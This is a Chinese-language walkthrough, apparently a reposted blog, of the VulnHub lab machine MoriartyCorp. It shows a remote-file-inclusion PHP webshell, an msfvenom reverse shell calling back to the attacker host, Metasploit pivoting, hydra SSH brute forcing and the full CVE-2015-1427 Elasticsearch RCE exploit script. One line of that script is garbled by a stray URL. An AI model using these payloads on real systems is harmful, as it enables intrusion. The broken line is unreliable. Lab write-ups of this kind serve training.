靶機:MoriartyCorp
靶機下載地址:https://www.vulnhub.com/entry/boredhackerblog-moriarty-corp,456/
靶機公網IP:192.168.3.65(該靶機用docker搭建了內網)
kali機IP:192.168.3.62
真機IP:192.168.3.44
虛擬機環境搭建:通過VirtualBox匯入虛擬機,網路連接方式選擇橋接模式,匯入虛擬機的時候注意不要勾選USB控制器,否則可能會出一些小問題
一、資訊收集
1. 探測靶機目標
nmap -sn 192.168.3.0/24
找到攻擊目標公網IP為192.168.3.65
2. 埠掃描
nmap -p- -A 192.168.3.65
掃描到有ssh服務(23埠)、http服務(注意不是80埠,而是8000埠和9000埠)
ssh服務不知道密碼,暫時先不管,先看看http服務用瀏覽器訪問是一些什么東西
http://192.168.3.65:9000
感覺像是一個后臺登陸界面,應該是登陸到內網服務器的,但是嘗試萬能密碼,使用弱口令進行暴力破解發現并不能成功,只能暫時先放下
http://192.168.3.65:8000
發現有一些提示資訊,讓我們先輸入flag{start},那就跟著提示走
輸入提示資訊提交后,提示我們訪問80埠
訪問80埠,點擊Blog post1和Blog post2,從內容中沒有得到什么有用資訊,但是看到路徑為../file=page1.html和../file=page2.html后,疑似存在檔案包含漏洞
包含一下www.baidu.com,發現存在遠程的檔案包含漏洞
http://192.168.3.65/?file=http://www.baidu.com
二、檔案包含漏洞的利用
1. 在真機上使用python搭建一個簡易服務器
在桌面上新建一個檔案夾,用來存放服務器的根目錄,取了個名字叫做http
打開檔案夾,直接在檔案路徑處輸入cmd進入終端,輸入以下命令
python -m http.server
# 默認開啟的是8000埠,如果要指定其他埠直接在后面輸入對應的埠號,如python -m http.server 80
2. 制作一句話木馬并將其放在剛才搭建好的服務器根目錄下
<?php @eval($_REQUEST['A']); ?>
3. 嘗試通過遠程檔案包含漏洞包含一下自己搭建好的建議服務器并包含到木馬檔案里去
成功包含木馬檔案,能成功訪問到phpinfo檔案資訊
4. 蟻劍連接獲取shell
http://192.168.3.65/?file=http://192.168.3.44:8000/shell.txt
連接成功后回傳到上一層目錄,找到第一個flag
提交flag得到下一步提示,要求掃描內網開放的80埠,這里還提示內網地址在172.17.0.3~254范圍內,看來下一步要進行滲透內網了
三、內網滲透
1. 制作反彈shell木馬檔案
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.3.62 lport=8084 -f elf > shell.elf
2. 將檔案上傳到靶機上,使用剛才使用的蟻劍上傳
3. 攻擊機開啟監聽
msfconsole #啟動msf
use exploit/multi/handler
set payload linux/x64/meterpreter_reverse_tcp
set LHOST 192.168.3.62 #注意IP和反彈木馬檔案一致
set LPORT 8084 #注意埠和反彈木馬檔案一致
run #等待反彈結果
4. 修改權限,執行檔案
chmod 777 shell.elf
./shell.elf
在連接的蟻劍上打開終端,發現上傳的shell.elf檔案沒有執行權限,需要手動開啟,然后執行檔案,回到kali等待反彈結果
反彈成功
查看一下內網IP,發現本機IP地址為172.17.0.3,這應該是其它內網服務器的網關地址
5. 創建路由
添加一條通往目標服務器內網的路由,讓目標路由分配給kali一個內網IP,這樣msf就可以直接訪問目標內網中其他設備
run autoroute -s 172.17.0.0/24 #創建跳板路由
6. 掃描內網主機80埠,172.17.0.4應該是內網中的主機
use auxiliart/scanner/portscan/tcp #使用tcp埠掃描輔助模塊
set rhosts 172.17.0.0/24 #設定掃描的內網網段
set ports 80 #設定掃描的埠
run #開始掃描
7. 設定轉發埠
sessions -i 1 #回傳shell會話
portfwd add -L 192.168.3.62 -l 2424 -p 80 -r 172.17.0.4 #將內網主機的80埠轉發到kali機2424埠
訪問內網主機80埠(可以看到內網IP已經映射到了本地),在這個頁面可以看到可以上傳檔案,但是需要密碼才能上傳
http://192.168.3.62:2424
8. 暴力破解密碼
上傳一句話木馬,然后使用burpsuite抓包
對密碼進行爆破,只有密碼為password時長度不一樣,看來上傳檔案密碼就應該是password
找到正確密碼后就能成功上傳
注意上傳的檔案存放路徑,點擊一下上傳的木馬檔案就能看到上傳路徑了
嘗試訪問一下phpinfo檔案資訊,看看上傳的木馬是不是真的可以利用,發現可以利用,那就用蟻劍連一下吧
http://192.168.3.62:2424/photo/22/muma.php?cmd=phpinfo();
9. 蟻劍連接,獲取內網主機shell
連接成功后回傳到上層目錄,成功找到第二個flag
提交flag,得到一串用戶名和密碼hash值,對密碼解密,提示用用戶名和密碼hash去攻擊ssh服務
通過md5解密,解密結果如下
63a9f0ea7bb98050796b649e85481845 root
7b24afc8bc80e548d66c4e7ff72171c5 toor
5f4dcc3b5aa765d61d8327deb882cf99 password
21232f297a57a5a743894a0e4a801fc3 admin
084e0343a0486ff05530df6c705c8bb4 guest
697c6cc76fdbde5baccb7b3400391e30 MORIARTY
8839cfc8a0f24eb155ae3f7f205f5cbc MCORP
35ac704fe1cc7807c914af478f20fd35 mcorp
b27a803ed346fbbf6d2e2eb88df1c51b weapons
08552d48aa6d6d9c05dd67f1b4ba8747 moriarty
還有另一種獲取內網的方法使用socks5代理+proxychains工具探測(前面7步一樣)
1. msf中設定socks代理
background #如果此時在會話監聽模式,使用background可以把監聽埠保存在后臺運行,如果要使用shell時再通過session -i [會話編號] 的方式進行切換
use auxiliary/server/socks_proxy #開啟socks5代理,msf6是socks_proxy,如果是msf5可能是socks4a
run #啟動socks代理
2. 在proxychains配置資訊中添加socks5代理配置
vim /etc/proxychains.conf
可以看到同樣可以找到內網主機,然后使用抓包,上傳木馬,使用蟻劍連接
proxychains nmap 172.17.0.0/24 -sV -sT -Pn -T4 -p80
# -sV 版本探測
# -sT 3次握手方式tcp掃描
# -Pn 掃描之前不需要用ping命令,有些防火墻禁用ping命令,可以使用此選項進行掃描
# -T 設定掃描執行緒,范圍在T1~6
# -p 設定掃描埠
10. 通過proxychains掃描ssh服務埠
根據flag2提示需要去攻擊SSH服務,一般為22埠,找到啟用SSH服務的內網主機,可以看到主機172.17.0.5是啟用了SSH服務的
proxychains nmap 172.17.0.0/24 -sV -sT -Pn -T4 -p22
11. 爆破ssh用戶名密碼
先創建兩個字典文本檔案,使用第9步得到的用戶名和密碼作為字典
使用hydra工具通過字典爆破,可以看到成功爆出ssh登陸用戶名為root,用戶密碼為weapons
proxychains hydra -L user.txt -p pass.txt ssh://172.17.0.5 -t 4
# -L 指定用戶名字典
# -p 指定密碼字典
# -t 設定執行緒
找到正確用戶名和密碼就可以登錄ssh了,登錄后在根目錄下找到第三個flag
提交flag后得到新的提示,有個用戶名為buyer13,密碼為arms13,此外還提示有個http服務可能不在80埠上,可能在443、8000、8080、8888這些埠,那就掃描這些埠看看
成功找到這臺http服務器的IP地址及埠號為:172.17.0.6:8000
proxychains nmap 172.17.0.0/24 -sV -sT -Pn -T4 -p443,8000,8080,8888
瀏覽器訪問一下這個提供http服務的內網主機,不過訪問之前需要設定瀏覽器的socks代理,將socks代理設定成socks5
訪問172.17.0.6:8000,輸入提示的用戶名密碼成功登陸,發現有個改密碼的地方Change Password,點進去發現是修改密碼的地方,猜測可能存在越權漏洞,因為如果能越權修改管理員密碼,那就直接可以拿到最高權限了
12. 越權漏洞利用
使用burpsuite抓取修改密碼的資料包,不過在抓包之前不僅要在瀏覽器里開啟代理和socks代理,burpsuite里同樣要開啟
抓包,將用戶名和密碼都修改為admin,然后再放包
退出后重新訪問,再次抓包洗掉舊的認證資訊,放包,重新登錄,這次就用用戶名為admin密碼也為admin進行登錄,發現能成功登陸,看來修改密碼處的確存在越權漏洞啊
點擊charts后就能看到第四個flag,提交flag
提交后發現還有提示資訊,提示有一臺主機運行著Elasticsearch服務,百度查找一下,發現該服務默認是在9200埠,那就繼續掃描內網主機
找到這臺Elasticsearch服務器的IP和埠為172.17.0.7:9200
使用kali自帶的searchsploit功能進行版本漏洞搜索,有個遠程代碼執行攻擊可以利用
searchsploit elasticsearch
使用36337.py腳本執行遠程代碼攻擊,能拿到shell,找到最后一個flag并提交就完成了
cd /usr/share/exploitdb/exploits/linux/remote
proxychains python 36337.py 172.17.0.7
若找不到那就用下面這個攻擊腳本
36337.py
點我看代碼
#!/bin/python2
# coding: utf-8
# Author: Darren Martyn, Xiphos Research Ltd.
# Version: 20150309.1
# Licence: WTFPL - wtfpl.net
import json
import requests
import sys
import readline
readline.parse_and_bind('tab: complete')
readline.parse_and_bind('set editing-mode vi')
__version__ = "20150309.1"
def banner():
print """\x1b[1;32m
▓█████ ██▓ ▄▄▄ ██████ ▄▄▄█████▓ ██▓ ▄████▄ ██████ ██? ██ ▓█████ ██▓ ██▓
▓█ ? ▓██? ?████▄ ?██ ? ▓ ██? ▓?▓██??██? ?█ ?██ ? ▓██? ██?▓█ ? ▓██? ▓██?
?███ ?██? ?██ ?█▄ ? ▓██▄ ? ▓██? ???██??▓█ ▄ ? ▓██▄ ?██??██??███ ?██? ?██?
?▓█ ▄ ?██? ?██▄▄▄▄██ ? ██?? ▓██▓ ? ?██??▓▓▄ ▄██? ? ██??▓█ ?██ ?▓█ ▄ ?██? ?██?
??████??██████?▓█ ▓██??██████?? ?██? ? ?██?? ▓███? ??██████???▓█??██▓??████??██████??██████?
?? ?? ?? ??▓ ??? ▓?█?? ?▓? ? ? ? ?? ?▓ ? ?? ? ?? ?▓? ? ? ? ??????? ?? ?? ??▓ ?? ??▓ ?
? ? ?? ? ? ? ? ?? ?? ?? ? ? ? ? ? ? ? ? ?? ? ? ? ??? ? ? ? ?? ? ? ?? ? ? ?
? ? ? ? ? ? ? ? ? ? ?? ? ? ? ? ?? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
?
Exploit for ElasticSearch , CVE-2015-1427 Version: %s\x1b[0m""" %(__version__)
def execute_command(target, command):
payload = """{"size":1, "script_fields": {"lupin":{"script": "java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()"}}}""" %(command)
try:
url = "http://%s:9200/_search?pretty" %(target)
r = requests.post(url=url, data=https://www.cnblogs.com/hgee/p/payload)
except Exception, e:
sys.exit("Exception Hit"+str(e))
values = json.loads(r.text)
fuckingjson = values['hits']['hits'][0]['fields']['lupin'][0]
print fuckingjson.strip()
def exploit(target):
print "{*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something"
while True:
cmd = raw_input("~$ ")
if cmd == "exit":
sys.exit("{!} Shell exiting!")
else:
execute_command(target=target, command=cmd)
def main(args):
banner()
if len(args) != 2:
sys.exit("Use: %s target" %(args[0]))
exploit(target=args[1])
if __name__ == "__main__":
main(args=sys.argv)
結束
轉載請註明出處,本文鏈接:https://www.uj5u.com/qiye/498796.html
標籤:訊息安全
下一篇:攻防世界pwn題:Recho